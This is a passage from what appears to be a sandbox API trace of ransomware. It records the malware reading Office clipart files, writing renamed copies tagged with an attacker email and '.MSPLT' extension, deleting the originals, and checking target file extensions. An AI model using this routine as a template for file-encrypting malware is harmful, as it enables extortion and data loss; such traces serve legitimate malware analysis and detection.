dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0296.440] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.440] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0296.442] GetLastError () returned 0x0 [0296.442] ReadFile (in: hFile=0x4c8, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x60ca, lpOverlapped=0x0) returned 1 [0296.446] WriteFile (in: hFile=0x44c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x60d0, lpOverlapped=0x0) returned 1 [0296.447] ReadFile (in: hFile=0x4c8, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0296.447] WriteFile (in: hFile=0x44c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0296.448] SetEndOfFile (hFile=0x44c) returned 1 [0296.448] CloseHandle (hObject=0x44c) returned 1 [0296.450] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.450] SetEndOfFile (hFile=0x4c8) returned 1 [0296.455] CloseHandle (hObject=0x4c8) returned 1 [0296.455] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0296.456] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf")) returned 1 [0296.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.457] lstrlenW (lpString=".doc") returned 4 [0296.457] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.457] lstrlenW (lpString=".docx") returned 5 [0296.457] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.457] lstrlenW (lpString=".pdf") returned 4 [0296.457] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.457] lstrlenW (lpString=".xls") returned 4 [0296.457] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.457] lstrlenW (lpString=".xlsx") returned 5 [0296.457] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.457] lstrlenW (lpString=".ppt") returned 4 [0296.457] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.457] lstrlenW (lpString=".zip") returned 4 [0296.457] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.457] lstrlenW (lpString=".rar") returned 4 [0296.457] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.457] lstrlenW (lpString=".bz2") returned 4 [0296.457] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.458] lstrlenW (lpString=".7z") returned 3 [0296.458] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.458] lstrlenW (lpString=".dbf") returned 4 [0296.458] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.458] lstrlenW (lpString=".1cd") returned 4 [0296.458] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.458] lstrlenW (lpString=".jpg") returned 4 [0296.458] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.458] lstrlenW (lpString=".doc") returned 4 [0296.458] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.458] lstrlenW (lpString=".docx") returned 5 [0296.458] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.458] lstrlenW (lpString=".pdf") returned 4 [0296.458] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.458] lstrlenW (lpString=".xls") returned 4 [0296.458] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.458] lstrlenW (lpString=".xlsx") returned 5 [0296.458] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.458] lstrlenW (lpString=".ppt") returned 4 [0296.458] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.459] lstrlenW (lpString=".zip") returned 4 [0296.459] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.459] lstrlenW (lpString=".rar") returned 4 [0296.459] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.459] lstrlenW (lpString=".bz2") returned 4 [0296.459] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.459] lstrlenW (lpString=".7z") returned 3 [0296.459] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.459] lstrlenW (lpString=".dbf") returned 4 [0296.459] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.459] lstrlenW (lpString=".1cd") returned 4 [0296.459] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0296.459] lstrlenW (lpString=".jpg") returned 4 [0296.459] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.459] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0296.459] lstrlenW (lpString="BD08808_.WMF") returned 12 [0296.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0296.460] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=47996) returned 1 [0296.460] CloseHandle (hObject=0x4c8) returned 1 [0296.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf")) returned 0x220 [0296.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0297.150] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.150] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0297.190] GetLastError () returned 0x0 [0297.190] ReadFile (in: hFile=0x4c0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0xbb7c, lpOverlapped=0x0) returned 1 [0297.194] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xbb80, lpOverlapped=0x0) returned 1 [0297.198] ReadFile (in: hFile=0x4c0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0297.198] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0297.198] SetEndOfFile (hFile=0x488) returned 1 [0297.199] CloseHandle (hObject=0x488) returned 1 [0297.202] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.202] SetEndOfFile (hFile=0x4c0) returned 1 [0297.207] CloseHandle (hObject=0x4c0) returned 1 [0297.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0297.208] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf")) returned 1 [0297.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.209] lstrlenW (lpString=".doc") returned 4 [0297.209] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.209] lstrlenW (lpString=".docx") returned 5 [0297.209] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.209] lstrlenW (lpString=".pdf") returned 4 [0297.209] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.209] lstrlenW (lpString=".xls") returned 4 [0297.209] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.209] lstrlenW (lpString=".xlsx") returned 5 [0297.209] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.209] lstrlenW (lpString=".ppt") returned 4 [0297.209] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.209] lstrlenW (lpString=".zip") returned 4 [0297.209] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.209] lstrlenW (lpString=".rar") returned 4 [0297.209] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.209] lstrlenW (lpString=".bz2") returned 4 [0297.209] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.209] lstrlenW (lpString=".7z") returned 3 [0297.210] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.210] lstrlenW (lpString=".dbf") returned 4 [0297.210] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.210] lstrlenW (lpString=".1cd") returned 4 [0297.210] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.210] lstrlenW (lpString=".jpg") returned 4 [0297.210] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.210] lstrlenW (lpString=".doc") returned 4 [0297.210] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.210] lstrlenW (lpString=".docx") returned 5 [0297.210] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.210] lstrlenW (lpString=".pdf") returned 4 [0297.210] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.210] lstrlenW (lpString=".xls") returned 4 [0297.210] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.210] lstrlenW (lpString=".xlsx") returned 5 [0297.210] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.210] lstrlenW (lpString=".ppt") returned 4 [0297.210] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.211] lstrlenW (lpString=".zip") returned 4 [0297.211] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.211] lstrlenW (lpString=".rar") returned 4 [0297.211] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.211] lstrlenW (lpString=".bz2") returned 4 [0297.211] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.211] lstrlenW (lpString=".7z") returned 3 [0297.211] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.211] lstrlenW (lpString=".dbf") returned 4 [0297.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.211] lstrlenW (lpString=".1cd") returned 4 [0297.211] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0297.211] lstrlenW (lpString=".jpg") returned 4 [0297.211] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.211] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0297.211] lstrlenW (lpString="BD10890_.GIF") returned 12 [0297.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0297.213] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=13515) returned 1 [0297.213] CloseHandle (hObject=0x4c0) returned 1 [0297.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif")) returned 0x220 [0297.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0297.214] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.214] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0297.216] GetLastError () returned 0x0 [0297.216] ReadFile (in: hFile=0x4c0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x34cb, lpOverlapped=0x0) returned 1 [0297.218] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x34d0, lpOverlapped=0x0) returned 1 [0297.220] ReadFile (in: hFile=0x4c0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0297.220] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0297.221] SetEndOfFile (hFile=0x488) returned 1 [0297.221] CloseHandle (hObject=0x488) returned 1 [0297.754] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.765] SetEndOfFile (hFile=0x4c0) returned 1 [0297.772] CloseHandle (hObject=0x4c0) returned 1 [0297.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0297.776] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif")) returned 1 [0297.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.777] lstrlenW (lpString=".doc") returned 4 [0297.777] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0297.777] lstrlenW (lpString=".docx") returned 5 [0297.777] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0297.777] lstrlenW (lpString=".pdf") returned 4 [0297.778] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0297.778] lstrlenW (lpString=".xls") returned 4 [0297.778] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0297.778] lstrlenW (lpString=".xlsx") returned 5 [0297.778] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0297.778] lstrlenW (lpString=".ppt") returned 4 [0297.778] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0297.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.778] lstrlenW (lpString=".zip") returned 4 [0297.778] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0297.778] lstrlenW (lpString=".rar") returned 4 [0297.778] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0297.778] lstrlenW (lpString=".bz2") returned 4 [0297.778] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0297.778] lstrlenW (lpString=".7z") returned 3 [0297.778] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0297.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.778] lstrlenW (lpString=".dbf") returned 4 [0297.778] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0297.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.778] lstrlenW (lpString=".1cd") returned 4 [0297.778] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0297.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.778] lstrlenW (lpString=".jpg") returned 4 [0297.778] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0297.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.779] lstrlenW (lpString=".doc") returned 4 [0297.779] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0297.779] lstrlenW (lpString=".docx") returned 5 [0297.779] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0297.779] lstrlenW (lpString=".pdf") returned 4 [0297.779] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0297.779] lstrlenW (lpString=".xls") returned 4 [0297.779] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0297.779] lstrlenW (lpString=".xlsx") returned 5 [0297.779] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0297.779] lstrlenW (lpString=".ppt") returned 4 [0297.779] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0297.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.779] lstrlenW (lpString=".zip") returned 4 [0297.779] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0297.779] lstrlenW (lpString=".rar") returned 4 [0297.779] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0297.779] lstrlenW (lpString=".bz2") returned 4 [0297.779] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0297.779] lstrlenW (lpString=".7z") returned 3 [0297.779] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0297.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.779] lstrlenW (lpString=".dbf") returned 4 [0297.779] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0297.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.780] lstrlenW (lpString=".1cd") returned 4 [0297.780] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0297.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0297.780] lstrlenW (lpString=".jpg") returned 4 [0297.780] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0297.780] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0297.780] lstrlenW (lpString="BD19695_.WMF") returned 12 [0297.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0297.781] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=12982) returned 1 [0297.781] CloseHandle (hObject=0x4c0) returned 1 [0297.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf")) returned 0x220 [0297.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0297.782] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, 